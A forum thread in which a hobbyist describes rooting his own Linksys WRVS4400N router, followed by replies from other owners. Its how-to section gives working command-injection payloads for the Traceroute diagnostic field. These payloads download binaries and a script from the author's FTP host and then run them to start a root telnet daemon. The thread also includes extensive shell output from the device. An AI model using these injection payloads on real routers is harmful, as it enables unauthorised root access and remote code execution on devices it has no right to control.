Linksys WRVS4400NX Business Gigabit Wireless-N VPN Security Router, Dual CPU Router w/ Hardware NAT, Managed GigE & 802.11n Draft-2 Options

[TrNSZ]

Hacking the WRVS4400NX Stock Firmware V1.1.03 for Full Linux Shell Access

[Before you continue, only try this on a Linksys WRVS4400NX with Firmware V1.1.03, kthnx]

In case anyone was interested, this post is about the Linksys Business WRVS4400N router. If you don't own one, you are not going to be too interested in this post, otherwise, continue on.

This all started because this router runs Linux but does not support any existing open Linux distribution, such as OpenWRT, DD-WRT, FreeWRT, etc. It's a vastly different architecture from most existing routers because it uses two CPUs - a STAR 9109 System-on-a-Chip which boots Linux and accesses 32MB of RAM and handles the Marvell WLAN chipset, runs hostapd and handles encryption, and is connected to the main CPU via internal Gigabit bridge. The main CPU is a STAR 9202, which is connected to a Vitesse VSC7385 (SparX G5) Managed GigE switch. The main CPU handles 64MB of RAM and 8MB of flash. Also interesting is that the 9202 has a hardware CPU/ASIC dedicated to NAT and a hardware Layer-7 Intrusion Protection System and Firewall capable of inspecting 30MB/s of packets which is powered by Broadweb SigXEL. It actually runs two operating system instances, one on each CPU with gigabit communication between the two internal systems.

Linksys does make GPL firmware sources (which includes the full tuned ARM cross-compiler) available for this router, but due to the fact it has some semi-exotic hardware (sadly, all of which is supported by binary modules) so OpenWRT/DD-WRT/FreeWRT isn't out of the question, but it just seems that nobody has been interested yet. I also don't have any machines running Linux (Solaris or AIX or FreeBSD, sure), which is what the binaries are for, so if I wanted a quick hack, I'd have to get it elsewhere.

The good thing is the stock OS is Linux as well. I really wanted access to these two extra CPUs in my house, so I decided to download the sources for the V1.1.03 firmware (and let it be known that Linksys makes horrible firmware, this is the first version to work correctly). I decided the best way to go would be to find a way to start a telnet daemon and shell on the box(s) directly, this way we can experiment without voiding the warranty or rebuilding the firmware completely, so I starting attacking the WebUI for holes.

Almost all Linux-based routers have holes due to poor code quality so I assumed this would be a very easy task, and I was right!

It only took about five minutes of source diving to notice that the Traceroute Diagnostic doesn't check input at all and the Ping Diagnostic relies on JavaScript to verify input on the client side. Thanks Linksys! I chose to work with the Traceroute Diagnostic because it even gives us a lovely output display in a pop-up window. Let us just say that I'm glad they didn't notice this particular bug, because it helps give us access to the router. Also, thank Linksys for leaving some debugging tools in their Busybox build such as "ftpget" and "ftpput" which allows us to easily download our own software to router. (Even if they didn't, there is still a few buffer overflows that should allow code execution, but that is extra work).

HOW-TO begins here (with some cross-compiled binaries for you, on my ftp site.):
Step 1- Authenticate to the router WebUI, go to Administration tab
Step 2- Then go to the Diagnostics tab, and enter into the TraceRoute Target: field... (Unchecked input FTW!)
Step 3- ";/usr/bin/ftpget -v trnsz.ath.cx /usr/bin/mkpasswd mkpasswd" (You'll know it works if you get ftpget: cmd QUIT(null) as the last line)
Step 4- ";/usr/bin/ftpget -v trnsz.ath.cx /sbin/tinylogin tinylogin" (Ditto)
Step 5- ";/usr/bin/ftpget -v trnsz.ath.cx /usr/sbin/utelnetd utelnetd"
Step 6- ";/usr/bin/ftpget -v trnsz.ath.cx /usr/sbin/telnet-enable.sh telnet-enable.sh" (This installs the telnet services and sets the password to the same as the primary (User 1) WebUI login, so be sure that is set! It doesn't automatically update yet, but you can use "passwd" on the shell.)
Step 7- ";/usr/sbin/telnet-enable.sh" (Fire it up!)

If the last line says " daemonizing" you did well.

CODE

$ telnet router 9023
Trying router...
Connected to router.
Escape character is '^]'.
stdin, stdout, stderr: 0 1 2

router login: root
Password:

BusyBox v1.00 (2007.09.03-08:41+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#

Now, remember, this is a multi-CPU box, but it is not SMP:
# cat /proc/mtd
dev: size erasesize name
mtd0: 00020000 00008000 "BootLoader "
mtd1: 00020000 00020000 "System Configuration"
mtd2: 00120000 00020000 "Signature"
mtd3: 004a0000 00020000 "Main CPU(9202) Kernel"
mtd4: 00200000 00020000 "Wireless CPU(9109) Kernel"

That is right, the second CPU actually runs its own Linux kernel. How would you access that second system? Easy -- sendcmd. Check out the two different kernels:

CODE

# sendcmd "cat /proc/version"; cat /proc/version
Linux version 2.4.27-star (root@localhost.localdomain) (gcc version 3.3.6) #2 Tue Sep 4 11:11:21 CST 2007
Linux version 2.4.27-star (root@localhost.localdomain) (gcc version 2.95.3 20010315 (release)) #143 Tue Sep 4 11:09:43 CST 2007

Here is ps, free, and some proc output from both "machines":

CODE

# ps
PID Uid VmSize Stat Command
1 root 328 S init
2 root SW [keventd]
3 root RWN [ksoftirqd_CPU0]
4 root SW [kswapd]
5 root SW [bdflush]
6 root SW [kupdated]
39 root 292 S /sbin/klogd
79 root 516 S /usr/sbin/mini_httpd -d /tmp/www -r Linksys WRVS4400N
86 root 412 S /usr/sbin/udhcpd /etc/udhcpd.conf
94 root 1120 S /usr/sbin/switch_app
98 root 596 S /usr/sbin/cli
99 root 340 S /usr/sbin/crond
101 root 228 S /usr/sbin/scfgmgr
103 root 220 S /usr/sbin/monitor init
106 root 216 S /usr/sbin/cmd_agent_ap
110 root 204 S /usr/sbin/pb_ap
193 root 224 S /usr/sbin/download
211 root 784 S ipsd
297 root 356 S /bin/radvd
713 root 356 S /bin/sh
2033 root 372 S /sbin/syslogd -f /etc/syslog.conf -R 192.168.1.198:51
9604 root 536 S /usr/sbin/pppd plugin pppoe eth1
9680 root 320 S /usr/sbin/ntp -z GMT-5 0 14 -h 192.5.41.40
10275 root 308 S /usr/sbin/routed -v 2 -s
10293 root 252 S /bin/dhcp6-serv
10961 root 428 S /usr/local/libexec/ipsec/pluto --secretsfile /etc/ips
10964 root 336 S N pluto helper # 0
10965 root 168 S _pluto_adns
10967 root 896 S /usr/sbin/snmp -f
10971 root 264 S /usr/sbin/reaim
11095 root 212 S /usr/sbin/IGMPProxy -n ppp0
11302 root 268 S N /usr/sbin/utelnetd -p 9023 -l /bin/sh -d
11684 root 428 S N /bin/sh
11696 root 316 R N ps
# sendcmd "ps"
PID Uid VmSize Stat Command
1 root 272 S init
2 root SW [keventd]
3 root RWN [ksoftirqd_CPU0]
4 root SW [kswapd]
5 root SW [bdflush]
6 root SW [kupdated]
26 root 224 S /bin/recvcmd
29 root 316 S /bin/sh
94 root 372 S /usr/sbin/hostapd -dB /tmp/marvell.conf
2156 root 308 S sh -c ps
2157 root 284 R ps
# free
total used free shared buffers
Mem: 62320 56668 5652 0 516
Swap: 0 0 0
Total: 62320 56668 5652
# sendcmd "free"
total used free shared buffers
Mem: 31024 10452 20572 0 80
Swap: 0 0 0
Total: 31024 10452 20572
# cat /proc/cpuinfo
Processor : FA526id(wb) rev 1 (v4l)
BogoMIPS : 153.60
Features : swp half thumb

Hardware : STAR_STR9100
Revision : 0000
Serial : 0000000000000000
# sendcmd "cat /proc/cpuinfo"
Processor : FA526id(wb) rev 1 (v4l)
BogoMIPS : 176.94
Features : swp half thumb

Hardware : STAR_STR9100
Revision : 0000
Serial : 0000000000000000
# lsmod
Module Size Used by
qr 10240 0
kris 562304 0
led 3824 0
lldp_mod 101752 2
push_button 1320 0
# sendcmd "lsmod"
Module Size Used by
led 2264 0
ap85 568488 1

In case you were wondering, Kris is the Intrustion Protection System which runs on CPU0. AP85 is the WLAN drivers that run on CPU1 along with hostapd to handle encryption. The interface to the hardware accelerated stuff is all via /proc/str9100/* and /proc/star* on both Linux instances and most of it is plaintext and very user-friendly. There is tons more options here than is available via the horrible Linksys WebUI. Some other tools of interest to hackers:

CODE

# flash_tools
This function will erase or program mtd.
Usage: flash_tools <erase|program> <mtdx> [filename]
Note: filename only required when program.
System mtd map:
============================================================
dev: size erasesize name
mtd0: 00020000 00008000 "BootLoader "
mtd1: 00020000 00020000 "System Configuration"
mtd2: 00120000 00020000 "Signature"
mtd3: 004a0000 00020000 "Main CPU(9202) Kernel"
mtd4: 00200000 00020000 "Wireless CPU(9109) Kernel"

(I've also pulled the BootLoader out and looked at it, it seems to be some loader called "Boot World".)

# cat /etc/issue
Welcome to \n (\m-\s-\r@\l/\b)
Faraday ramdisk 1.0

Copyright © 2002 2003 <www.faraday.com.tw>
Copyright © 2002 Faraday ramdisk 1.0
Released under GNU GPL

# sendcmd "cat /etc/issue"
Welcome to \n (\m-\s-\r@\l/\b)
Starsemi ramdisk 1.0

Copyright © 2005 Starsemi ramdisk 1.0
Released under GNU GPL

# cat /etc/rcS
#!/bin/sh
export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/sbin/scripts

UTC=yes
#For two CPU communicate issue, UP eth2 at the very front. David @May 27
ifconfig eth2 up

# build var directories
/bin/mkdir -m 0777 /tmp/var
/bin/mkdir -m 0777 /tmp/var/run
/bin/mkdir -m 0777 /var/lock
/bin/mkdir -m 0777 /var/log
/bin/mkdir -m 0777 /var/run
/bin/mkdir -m 0777 /var/tmp
/bin/mkdir -m 0777 /tmp/etc
/bin/mkdir -m 0777 /tmp/sparx_g5_sercomm

/bin/mkdir -m 0777 /var/lib
/bin/mkdir -m 0777 /var/lib/dhcp-fwd

/bin/mkdir /tmp/fs1

# insert modules
/sbin/insmod /usr/sbin/push_button.o
#ifconfig eth1 up

#start services

brctl addbr br0
brctl setfd br0
brctl stp br0 no
ifconfig eth0 up
brctl addif br0 eth0
brctl addif br0 eth2

# stamp lan start time
/bin/cp /proc/uptime /tmp/lan_uptime

ifconfig lo 127.0.0.1
route add -net 127.0.0.0 netmask 255.255.0.0 lo



# debug staff
#/usr/sbin/utelnetd&

/sbin/klogd&

#/usr/sbin/rc start
/usr/sbin/rc wan_mac start
insmod /usr/sbin/lldp_mod.o
/usr/sbin/rc lan start
/usr/sbin/rc printk start
/usr/sbin/rc syslogd start
/usr/sbin/rc httpd start
/usr/sbin/rc dhcpd start
/usr/sbin/rc route start
#/usr/sbin/rc ripd start
/usr/sbin/rc switch start
#/usr/sbin/dproxy -c /etc/resolv.conf&


/usr/sbin/crond &
/usr/sbin/scfgmgr
/usr/sbin/monitor init
/usr/sbin/cmd_agent_ap
/usr/sbin/pb_ap&
/usr/sbin/wizd &

#echo "0 0" > /proc/sys/vm/pagetable_cache
# router
echo 1 > /proc/sys/net/ipv4/ip_forward
# pppox
echo 1 > /proc/sys/net/ipv4/ip_dynaddr

# add more conntrack
echo 10240 > /proc/sys/net/ipv4/ip_conntrack_max
#make a vpn config file let firewall start firewall
#echo 1>/var/tmp/vpn.conf
# ignore_all not yet used: this should be satisfactory
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
# drop spoofed addr: turn this off when rip is on ?
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter
# do not honor source route flags
echo 0 > /proc/sys/net/ipv4/conf/default/accept_source_route
echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route
# this needs proper sampling on av_blog to determine optimal value
# for now just observe softnet_stats to see # time was throttled
# historical value was 300
echo 100 > /proc/sys/net/core/netdev_max_backlog

echo 2 > /proc/sys/net/ipv4/conf/all/force_igmp_version
# 1720 is H323 port
echo "table alg add sport:1720" > /proc/star9100_shnat_setting
# 1723 is PPTP port
echo "table alg add sport:1723" > /proc/star9100_shnat_setting

sleep 3
/usr/sbin/rc upnp start

#enable sercomm download
/usr/sbin/download
/sbin/insmod /usr/sbin/led.o
/usr/sbin/rc ips start

/usr/sbin/ssl_server &
#/usr/sbin/rc vpn restart&
/usr/sbin/rc natpt start
/usr/sbin/rc dhcp6 start
/usr/sbin/rc radvd start
/usr/sbin/rc snmp start
/usr/sbin/rc lldp start

/usr/sbin/rc wlan create
/usr/sbin/rc wlan start

/usr/sbin/check_mac


/usr/sbin/rc sigmail start
/usr/sbin/rc vpn_netbios start

/sbin/insmod /usr/sbin/qr.o
echo "X5" > /proc/led
# sendcmd "cat /etc/rcS"
#!/bin/sh
setup_ap.sh
# eth0 of 9109 must start behide eth2 of 9202
/bin/sleep 10
echo "==================================================="
ifconfig eth0 up
brctl addbr br0
#Delay add ap0 to br0 because we need change ap0's mac
#Seems that br0 can not work if we change ap0's mac if ap0 is member of br0
#brctl addif br0 ap0
brctl addif br0 eth0
ifconfig br0 up
/bin/recvcmd &
insmod /usr/lib/led.o

# ifconfig -a
br0 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::213:10ff:fedb:bdbc/64 Scope:Link
inet6 addr: 2002:c0a8:101::1/64 Scope:Global
UP BROADCAST RUNNING PROMISC ALLMULTI MULTICAST MTU:1500 Metric:1
RX packets:637410 errors:0 dropped:0 overruns:0 frame:0
TX packets:756836 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:54178272 (51.6 MiB) TX bytes:488544150 (465.9 MiB)

eth0 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
inet6 addr: fe80::213:10ff:fedb:bdbc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:613207 errors:0 dropped:0 overruns:0 frame:0
TX packets:728827 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:57882461 (55.2 MiB) TX bytes:439980328 (419.5 MiB)

eth1 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BD
inet6 addr: fe80::213:10ff:fedb:bdbd/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:737881 errors:0 dropped:0 overruns:0 frame:0
TX packets:627576 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:485888533 (463.3 MiB) TX bytes:52300703 (49.8 MiB)

eth2 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
inet6 addr: fe80::213:10ff:fedb:bdbc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:24457 errors:0 dropped:0 overruns:0 frame:0
TX packets:46999 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5235285 (4.9 MiB) TX bytes:41481002 (39.5 MiB)

gre0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1476 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

ipsec0 Link encap:Point-Point Protocol
inet addr:74.173.88.193 Mask:255.255.255.255
UP RUNNING NOARP MTU:16260 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

ipsec1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:0 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

ipsec2 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:0 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

ipsec3 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:0 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:11337 errors:0 dropped:0 overruns:0 frame:0
TX packets:11337 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9800712 (9.3 MiB) TX bytes:9800712 (9.3 MiB)

ppp0 Link encap:Point-Point Protocol
inet addr:XXX.XXX.XXX.XXX P-t-P:65.14.252.3 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1492 Metric:1
RX packets:431538 errors:0 dropped:0 overruns:0 frame:0
TX packets:379348 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:305369971 (291.2 MiB) TX bytes:22586181 (21.5 MiB)

sit0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

teql0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

tunl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

# sendcmd "ifconfig -a"
ap0 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BD
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:34028 errors:0 dropped:0 overruns:0 frame:0
TX packets:51620 errors:0 dropped:1 overruns:0 carrier:1
collisions:0 txqueuelen:1000
RX bytes:1912768 (1.8 MiB) TX bytes:42492772 (40.5 MiB)
Interrupt:5 Memory:b0000000-b0020000

br0 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BD
inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:25017 errors:0 dropped:0 overruns:0 frame:0
TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3535531 (3.3 MiB) TX bytes:776 (776.0 B)

eth0 Link encap:Ethernet HWaddr 00:AA:BB:CC:DD:20
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:47019 errors:0 dropped:0 overruns:0 frame:0
TX packets:24469 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:42196127 (40.2 MiB) TX bytes:5109777 (4.8 MiB)

eth1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
[NO FLAGS] MTU:0 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

# sendcmd "iwconfig"
ap0 IEEE802.11-DS ESSID:"XXXXXXX"
Channel:3 Access Point: 00:14:A5:9B:5A:B2
RTS thr=2346 B Fragment thr:off
Encryption key:XXXXXXXXXXXXXX
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 invalid crypt:0 invalid misc:0

Finally, if you want to send files from Linux running on CPU0 to Linux running on CPU1 you can do so via sendcmd, the interface is `sendcmd "remotefilepathname" "localfilepathname" and it'll be sent to the second CPU.

I've determined how to do more things too like control the LEDs on the front of the router (via /proc/led) and more, but right now my focus is on adding some features to the stock firmware. Just now, I was able to get access to a Linux box and was able to compile a stock WRVS4400N.BIN V1.10.3 firmware image, so the current task will be to add dropbear SSH to it and a few other tools to make life easier. I'll update this thread when I do. I can't believe nobody has "hacked" this router before, it seems very powerful.

I also really want to be able to run the SixXS IPv6 tunnel software (and integrate it into the GUI eventually) as well as some configurable IRC bouncer software (maybe muh or psybnc?) and some basic information like load averages would be interesting. If anyone else has suggestions, please let me know.

Have fun.

ftp://trnsz.ath.cx/ for binaries/tools used, but the scripts as above will install them from my FTP. You'll just have to trust me.


Edit 1: Attached the WRVS4400N ARM binaries for mknod and utelnetd, so you put them on your own FTP server.
Edit 2: Advise to start utelnetd only on the internal LAN interface!
Edit 3: Mounting devpts does work, you need to `echo "none /dev/pts devpts defaults 0 0" >> /etc/fstab` and then `mount -t devpts /dev/pts` to make it work. This really does eliminate the need for mknod, but you can do this after you login to the box, because the mknod method seems more failsafe for morons when using WebUI hax. You can safely remove the mknod entries and do this after login if you wish or try it via the TraceRoute UI hack if you want.
Edit 4: Both CPU operating system images are decompressed from Flash to RAM, so I think you'd have to try hard to brick your router because everything is reset except NVRAM when you reboot, but please be very careful! In examining the WebUI for five minutes I found two ways to get bad input into scripts from the WebUI that could cause the router not to boot until you reset it to factory defaults. Linksys really sucks at writing firmware. The DD-WRT guys need to get going on this two-CPU monster. I just don't have the time.
Edit 5: General cleanup.
Edit 6: Added information for SigXEL packet classifier.
Edit 7: New improved procedure which mounts /dev/pts, only binds to the LAN, and uses login for improved security.
Edit 8: Removed /usr/sbin/cli tour, but you can check it out yourself with cli -c "?", it's the CLI to control the managed switch.
Edit 9: Removed attached binaries, access them at ftp://trnsz.ath.cx/. Also, rewrote the telnet-enable.sh script to use the primary password from the WebUI. Makes more sense!
Edit A: Cleanup, title post.


This post has been edited by TrNSZ: Nov 3 2007, 03:41

[Zao]

Nice detective work, looks like a quite awesome platform.

[TrNSZ]

Nice detective work, looks like a quite awesome platform.

It isn't 100% stable really, because appears that idle sessions will timeout and not drop properly, and sometimes utelnetd will be stopped for whatever reason, but the script is setup so a quick traceroute to ;/usr/sbin/telnet-enable.sh will bring it back up.

Also, if anyone is interested, I have managed to compile a firmware image that has the telnet server built-in (V1.1.03-TrN), and operating on both the Main (192.168.1.1) and the Wireless CPU (192.168.1.2), just as a test to see if I understand the development environment correctly. It's confusing that they use different toolchains and compiler versions on each CPU. They also use different libc (libuClibc-0.9.26 vs. 0.9.27) versions.

However, if this works correctly, I'm going to add xinetd, dropbear-ssh, SixXS AICCU/AYIYA, muh or psybnc, and upgrade Busybox with some additional tools and build htop, screen, and some other local niceness. Sorry if I'll leave everyone hanging but I just don't feel like any reflash/reboot disasters this last at night. The hardest part will be getting web interfaces working for the new tools. I also plan to add SNMP support to CPU1, because right now the stock SNMP can only report what is going on in CPU0.

Edit: The hard part isn't getting extra software in the router, there was about 3.4MB free on the stock ramdisk. I think it will be to decide what CPU to run what software on because dynamic binaries between the two are not quite compatible.

This post has been edited by TrNSZ: Nov 3 2007, 04:43

[tsndcb]

Hi TrNSZ,

Can you explain (step by step) us how you've make the new firware ?

Thanks in advanced

[surfer298]

Awesome work...i got a wrvs4400n for xmas and would like to improve the crappy linksys firmware...how did you manage to build your ohn firmware with drobear etc?
Best regards,
mike

[Vince.T]

You made me subscribe to this forum !
This is a great step forward custom firmware for this nice box. All "usual" alternate firmwares (dd-wrt, open-wrt, sveasoft, ...) are not considering porting to wrvs4400n, so you are our last hope !
The problem seems to be on the binaries which prevent newer kernels to be compiled
Let us know your progress on this awesome box !
Linksys is to release a firmware very soon to correct broken DHCP behavior soon, but well...... I'd prefer a clean one and openness

and Happy New Year !

[surfer298]

hi do you have any information when linksys is releasing an new firmware? i also did have problems with dhcp...
yesterday i tried to flash a new firware which i compiled myself...but the result was rather disappointing...the red led is always on and the router ist bricked....now i am sending it back for repair..

greetings
mike

[kcarmich]

has anybody been able to build from source the firmware? I tried and ended up with firmware that is smaller than the one downloaded? did they exclude something required to build?

[Ryan8613]

I would be interested in seeing etherchannel support. I realize the switch supports trunks, but I've always liked the concept of etherchannels. No real advantage to the technology, just something fun to play with (say, dual GigE off to a linux server FTW? )

Ryan

This post has been edited by Ryan8613: Feb 9 2008, 08:57

[eduncan911.com]

This post is what made the decision for me to purchase the WRVS4400N instead of the WRT600N.

But sadly in haste, I "assumed" the "dual radios" meant it would work 5Ghz 11n over one radio, and 2.4Ghz 11b/g over the other radio.

Coem to find out after several calls to Linksys 2nd tier support is that, and I quote, "The 2nd radio is not in use at this time. The next version of the hardware and firmware will support 5Ghz A and N. But your version will not be flash upgradable to support this as the hardware has changed."

That ticked me off because in my building, a 11g spectrum analyzer shows 42 seperate B/G networks and 15 "N" networks. Too much interference for me to hold a solid 11g connection. And all of the 11n networks are sitting on 20 and 40mhz.

What's interesting is no one is on the 5Ghz band. So this is why I am returning the WRVS4400N and going for the WRT600N (and dd-wrt when it matures more for the 600n).

Good luck with the wrvs4400n! It really looks like an impressive piece of hardware. But with no support planned from dd-wrt and this "oh, there is a 2nd radio - but it is not used" experience, the 4400n lost a big fan.

[Lumute]

Hi TrNSZ,

First let me thank you for your great work on this router!

Did you ever get anywhere compiling a custom firmware and uploading it? did it work? could you give us an update on your work on this router? last thing we heard from you about this was like 4 months ago, I cant believe you did all that work to just abandon it...

Cheers,

Lumute

[jctsoi]

Hello.

I recently purchased the WRVS4400N and when I tried to do as the instructions stated I found that your FTP site is no longer working. do you know when it will be back up or when you will post the firmware image?

This post has been edited by jctsoi: Apr 12 2009, 20:33